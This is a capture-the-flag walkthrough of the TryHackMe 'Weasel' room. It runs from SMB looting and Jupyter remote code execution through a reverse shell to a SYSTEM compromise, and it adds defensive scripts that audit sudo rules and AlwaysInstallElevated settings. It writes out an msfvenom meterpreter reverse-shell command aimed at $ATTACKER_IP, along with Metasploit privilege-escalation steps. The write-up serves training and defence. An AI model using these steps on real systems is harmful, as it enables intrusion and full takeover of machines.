# Weasel

{% embed url="https://tryhackme.com/room/weasel" %}

### Phase 1 - Reconnaissance

First, we start with an `nmap` scan:

<figure><img src="/files/2j04fRyPxpRsZ9RDY3Ps" alt=""><figcaption></figcaption></figure>

<details>

<summary>Full scan</summary>

```
┌─[root@edu-virtualbox]─[/home/edu/THM/weasel]
└──╼ #cat scan.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-19 21:40 CEST
Nmap scan report for 10.10.186.146
Host is up (0.028s latency).
Not shown: 65520 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
22/tcp    open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
|   2048 2b:17:d8:8a:1e:8c:99:bc:5b:f5:3d:0a:5e:ff:5e:5e (RSA)
|   256 3c:c0:fd:b5:c1:57:ab:75:ac:81:10:ae:e2:98:12:0d (ECDSA)
|_  256 e9:f0:30:be:e6:cf:ef:fe:2d:14:21:a0:ac:45:7b:70 (ED25519)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: DEV-DATASCI-JUP
|   NetBIOS_Domain_Name: DEV-DATASCI-JUP
|   NetBIOS_Computer_Name: DEV-DATASCI-JUP
|   DNS_Domain_Name: DEV-DATASCI-JUP
|   DNS_Computer_Name: DEV-DATASCI-JUP
|   Product_Version: 10.0.17763
|_  System_Time: 2023-05-19T19:41:58+00:00
| ssl-cert: Subject: commonName=DEV-DATASCI-JUP
| Not valid before: 2023-03-12T11:46:50
|_Not valid after:  2023-09-11T11:46:50
|_ssl-date: 2023-05-19T19:42:06+00:00; +3s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8888/tcp  open  http          Tornado httpd 6.0.3
|_http-server-header: TornadoServer/6.0.3
| http-title: Jupyter Notebook
|_Requested resource was /login?next=%2Ftree%3F
| http-robots.txt: 1 disallowed entry
|_/
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=5/19%OT=22%CT=1%CU=36243%PV=Y%DS=2%DC=T%G=Y%TM=6467D10
OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=109%TI=I%CI=I%II=I%SS=S%TS=
OS:U)OPS(O1=M508NW8NNS%O2=M508NW8NNS%O3=M508NW8%O4=M508NW8NNS%O5=M508NW8NNS
OS:%O6=M508NNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%
OS:DF=Y%T=80%W=FFFF%O=M508NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=
OS:0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S
OS:=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=
OS:Z)

Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2023-05-19T19:41:59
|_  start_date: N/A
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
|_clock-skew: mean: 2s, deviation: 0s, median: 2s

TRACEROUTE (using port 993/tcp)
HOP RTT      ADDRESS
1   23.98 ms 10.8.0.1
2   24.70 ms 10.10.186.146

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 122.98 seconds
```

</details>

So we have an SMB server, an HTTP server, an RDP server, an SSH server and a not yet identified service on port `5985`.

#### SMB

Let's see what's in the SMB server first. We use `smbclient` for this:

<figure><img src="/files/gfXTTlhKLRjvEcAG7ZKF" alt=""><figcaption></figcaption></figure>

So there's an open `datasci-team` share, which means we can connect to it with an empty password. Let's see what's inside:

<figure><img src="/files/OiJPA4PpDEf3H6tSe8mL" alt=""><figcaption></figcaption></figure>

Let's get all the files. In `smbclient`, the most efficient way is to turn prompting off, turn recursion on and use `mget` with a wildcard mask:

```
prompt OFF
recurse ON
mget *
```

<figure><img src="/files/Mc7m6jTuFvkaNwZMrjQn" alt=""><figcaption></figcaption></figure>

We find a Jupyter token in the `/misc` directory:

<figure><img src="/files/FDsTsPH4ya7TUZyrS7hV" alt=""><figcaption></figcaption></figure>

#### HTTP

On port 8888, we find a `Jupyter` webserver, where we can use the token we found:

<figure><img src="/files/1JJOvPkgSffq42U6imFa" alt=""><figcaption></figcaption></figure>

After we press the "Log in" button, we get access to a Jupyter portal:

<figure><img src="/files/lmZTNlidFJcdIQtL2wKJ" alt=""><figcaption></figcaption></figure>

From here, we should be able to get RCE. First, we make a new `Python 3` notebook:

![](/files/bIb7yG8u5x11XrNsADV9)

In Jupyter, you can run system commands by using

```
!SYSTEM_COMMAND
```

So we enter the command `id`, and then we press the `run` button at the top:

<figure><img src="/files/XUYfL1LO6troO3U9i6TA" alt=""><figcaption></figcaption></figure>

Before getting a reverse shell, we need to set up a listener using `netcat`:

![](/files/oD3s5OcWzJaWRJtgyVFR)

From the `uid` output, it becomes clear this is a Linux environment, so we'll use a Linux reverse shell from revshells.com:

<figure><img src="/files/Gyi5wynlQH9kU1h8s9Pg" alt=""><figcaption></figcaption></figure>

After pressing `run`, we get a connection back:

![](/files/MOIzn7h19sSFUDiTTq6Y)

### Phase 2 - Initial access

First, we stabilize our shell:

```bash
# press Ctrl-Z to background the shell
stty raw -echo
fg
# press Enter
stty rows 52 cols 238
export TERM=xterm
```

<figure><img src="/files/8X2CNE41ZXH8rBU4dG4w" alt=""><figcaption></figcaption></figure>

After looking around a bit in the user's home directory, it seems we are in a WSL (Windows Subsystem for Linux) environment. `wslu` is a common set of WSL utilities (WSL-utilities).

<figure><img src="/files/hYJfFkGhiovMw7ReqWWT" alt=""><figcaption></figcaption></figure>

<details>

<summary>Rabbithole (getting root on WSL)</summary>

Now that we have a shell, let's check `sudo -l`:

<img src="/files/52l9LvOodhYESKybLz0T" alt="" data-size="original">

The rule for `/home/dev-datasci/.local/bin/jupyter` looks very exploitable, because it lets us run a file we own as root.

<img src="/files/pmMdgJxh5DZt3Oi5reyz" alt="" data-size="original">

There is no `jupyter` file in this directory yet, so let's create one:

<img src="/files/MGFuQGODjqHWUYk58moG" alt="" data-size="original">

And we have root on the Linux box.

</details>
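A defender's counterpart to this rabbithole, added here and not part of the original writeup: the script below parses `sudo -l` output and flags every rule whose command sits in a path the invoking user can write, including the case seen above where the binary does not exist but its parent directory belongs to the user. The sample `sudo -l` output and the fake filesystem are constructed; `real_lookup` runs the same check against a live system.

```python
import os
import re
import stat

# Matches "sudo -l" entries such as "    (root) NOPASSWD: /home/dev-datasci/.local/bin/jupyter"
RULE_RE = re.compile(r"^\s*\(([^)]+)\)\s+(?:[A-Z_]+:\s*)*(/\S+)")

def real_lookup(path):
    try:
        st = os.lstat(path)  # live filesystem; symlinks are not followed
    except FileNotFoundError:
        return None  # component does not exist
    return (st.st_uid, st.st_gid, st.st_mode)

def user_can_write(meta, uid, gids):
    owner, group, mode = meta  # classic owner/group/other write-bit check
    if owner == uid:
        return bool(mode & stat.S_IWUSR)
    if group in gids:
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)

def writable_component(cmd, uid, gids, lookup=real_lookup):
    """The binary or the first ancestor directory the user can write (lets them replace the
    binary), else None. Missing components are skipped so the nearest existing directory
    decides, which is exactly the writeup's case (a missing file in a user-owned bin/)."""
    p = cmd
    while True:
        meta = lookup(p)
        if meta is not None and user_can_write(meta, uid, gids):
            return p
        if p == "/":
            return None
        p = os.path.dirname(p)

def audit_sudo_l(output, uid, gids, lookup=real_lookup):
    """Map each command allowed by 'sudo -l' output to its hijackable component (None = safe)."""
    return {m.group(2): writable_component(m.group(2), uid, gids, lookup)
            for m in map(RULE_RE.match, output.splitlines()) if m}

# Constructed sample: the writeup's rule plus a benign one, checked against a fake filesystem
# that deliberately has no .../bin/jupyter file, as on the box (lookup = FAKE_FS.get)
SAMPLE_SUDO_L = """User dev-datasci may run the following commands on DEV-DATASCI-JUP:
    (root) NOPASSWD: /home/dev-datasci/.local/bin/jupyter
    (root) NOPASSWD: /usr/bin/id
"""
D, F = 0o40755, 0o100755  # rwxr-xr-x directory / regular file
FAKE_FS = {"/": (0, 0, D), "/home": (0, 0, D), "/usr": (0, 0, D), "/usr/bin": (0, 0, D),
           "/usr/bin/id": (0, 0, F), "/home/dev-datasci": (1000, 1000, D),
           "/home/dev-datasci/.local": (1000, 1000, D), "/home/dev-datasci/.local/bin": (1000, 1000, D)}
```

Running `audit_sudo_l(SAMPLE_SUDO_L, 1000, [1000], FAKE_FS.get)` reports the `jupyter` rule as hijackable via `/home/dev-datasci/.local/bin` and the `/usr/bin/id` rule as safe; the fix is to point sudo rules only at root-owned paths.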

We find a private SSH key for a "lowpriv" user:

![](/files/R5e8loGQEoyH88K2aGIU)

We copy this back to our machine, and save it:

<figure><img src="/files/pMWHCjbMk2Nx3TiNqmoc" alt=""><figcaption></figcaption></figure>

We can use it to connect over SSH with this command:

```
ssh -i ID_RSA_FILE dev-datasci-lowprive@IP_ADDRESS
```

<figure><img src="/files/QR2KTgSP6I4DYmrt0ZMt" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/LJ1Eu3qDKBiSvm7mhG4H" alt=""><figcaption></figcaption></figure>

And we have an SSH shell on the system.

After connecting, we can find the `user.txt`:

<figure><img src="/files/gLiejH35EEMxevyXWYCH" alt=""><figcaption></figcaption></figure>

### Phase 3 - Privilege escalation

We will be using PowerShell for this phase, as it has some handy features:

<figure><img src="/files/xE2izWvfzPNc5OTflWlh" alt=""><figcaption></figcaption></figure>

Let's get `winpeas.exe` on the system:

First, we open a `python3` server on our attacking machine:

<figure><img src="/files/acL5I48MdHjwaYVvQ98X" alt=""><figcaption></figcaption></figure>

Then, we download it to the target and run it:

<figure><img src="/files/jzqGIfHvPgbjIjEahtxw" alt=""><figcaption></figcaption></figure>

We can check the log using

```powershell
cat winlog.txt | Out-Host -Paging
```

![](/files/2jIylvAUqHCErDflHrRQ)

#### Final exploit

So we're dealing with a 64-bit architecture.

To exploit this vulnerability (the `AlwaysInstallElevated` misconfiguration used below), we need an "interactive" session. This means the session needs to have a GUI attached, because `msiexec.exe` needs a GUI to run correctly. \
For this to work, we'll need to do some process migration.\
So let's boot up `msfconsole` and get to work:

First, we use `msfvenom` to generate a `meterpreter` reverse shell:

<figure><img src="/files/iSMQouX8oHNhxaryafPs" alt=""><figcaption></figcaption></figure>

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4444 -f exe -o meterpreter_reverse.exe
```

{% hint style="info" %}
Make sure to replace `$ATTACKER_IP` with your TryHackMe VPN IP.
{% endhint %}

To get it onto the target system, we serve it from our machine with Python's built-in HTTP server (`SimpleHTTPServer` in Python 2, `http.server` in Python 3):

<figure><img src="/files/oLL8GEBPv4OB4l07N82Z" alt=""><figcaption></figcaption></figure>

Before running the exploit, we create a listener:

<figure><img src="/files/Ixy7j73MuH0VsEN7pvkU" alt=""><figcaption></figcaption></figure>

Then, we download the reverse shell and execute it:

<figure><img src="/files/SxkHkmLwdVfyx5eDJ5sX" alt=""><figcaption></figcaption></figure>

And we get our `meterpreter` shell back:

<figure><img src="/files/SqTs5IUwufECFbJP8XT5" alt=""><figcaption></figcaption></figure>

Let's check our process ID and the process list (`ps`):

<figure><img src="/files/Ow6GPPuUtIhziKA18f96" alt=""><figcaption></figcaption></figure>

Our process is PID `892`; its parent is `1036` (`powershell.exe`), whose parent in turn is `3892` (`cmd.exe`). Under the `Session` column, you can see it runs in session 0:

<figure><img src="/files/dGu7GCdpczD2dmFNBWDD" alt=""><figcaption></figcaption></figure>

This means our process is running in the non-interactive session 0, so the MSI exploit won't work.\
We need to migrate into a process that runs in session 1.

For example, `svchost.exe` with PID 2612 runs in session 1, so let's migrate there:

<figure><img src="/files/zffaE509hjnmTyqxFhmt" alt=""><figcaption></figcaption></figure>

Then, we background the shell and use the `AlwaysInstallElevated` MSF exploit:

<figure><img src="/files/JJ7vMx8O11AZdkQ0DX2p" alt=""><figcaption></figcaption></figure>
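The precondition this exploit depends on, written up as a defender's check (added here, not part of the original writeup): Windows Installer only runs per-user MSI packages with SYSTEM privileges when `AlwaysInstallElevated` is a DWORD `1` under both HKLM and HKCU. The registry states below are constructed; `winreg_reader` performs the same read against a live Windows registry.

```python
import os
from typing import Callable, Optional

# Both hives must hold a DWORD 1 for the policy to take effect; one hive alone does nothing.
INSTALLER_KEY = r"SOFTWARE\Policies\Microsoft\Windows\Installer"
VALUE_NAME = "AlwaysInstallElevated"

def winreg_reader(hive_name: str) -> Optional[int]:
    """Read the DWORD from the live registry (Windows only); None if key or value is absent."""
    import winreg  # standard library, but importable only on Windows
    hive = winreg.HKEY_LOCAL_MACHINE if hive_name == "HKLM" else winreg.HKEY_CURRENT_USER
    try:
        with winreg.OpenKey(hive, INSTALLER_KEY) as key:
            value, _ = winreg.QueryValueEx(key, VALUE_NAME)
    except FileNotFoundError:
        return None
    return int(value)

def assess(read: Callable[[str], Optional[int]]) -> str:
    """Classify the machine from the two policy values; 'read' maps 'HKLM'/'HKCU' to a value."""
    hklm, hkcu = read("HKLM"), read("HKCU")
    if hklm == 1 and hkcu == 1:
        return "VULNERABLE"  # any local user can install an MSI as SYSTEM
    if hklm == 1 or hkcu == 1:
        return "PARTIAL"     # not exploitable as-is, but a misconfiguration worth fixing
    return "OK"

# Constructed registry states (the exploit succeeding on the box implies the first one)
WEAK_BOX = {"HKLM": 1, "HKCU": 1}
FIXED_BOX = {"HKLM": 0, "HKCU": None}  # remediation: delete both values or set them to 0

if __name__ == "__main__":
    print("constructed weak box:", assess(WEAK_BOX.get))
    if os.name == "nt":
        print("this machine:", assess(winreg_reader))
```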

Next, we configure the exploit module:\
We use session 13, the Meterpreter session we backgrounded in the screenshot above.

<figure><img src="/files/GJKfyTuYYp4aON8GiTwc" alt=""><figcaption></figcaption></figure>

Then, we run it, and get root:

<figure><img src="/files/x65UehtFXNAAUQ7MFUwf" alt=""><figcaption></figcaption></figure>

For `root.txt`:

<figure><img src="/files/fb1cdHCNUfMAoovNiKSz" alt=""><figcaption></figcaption></figure>
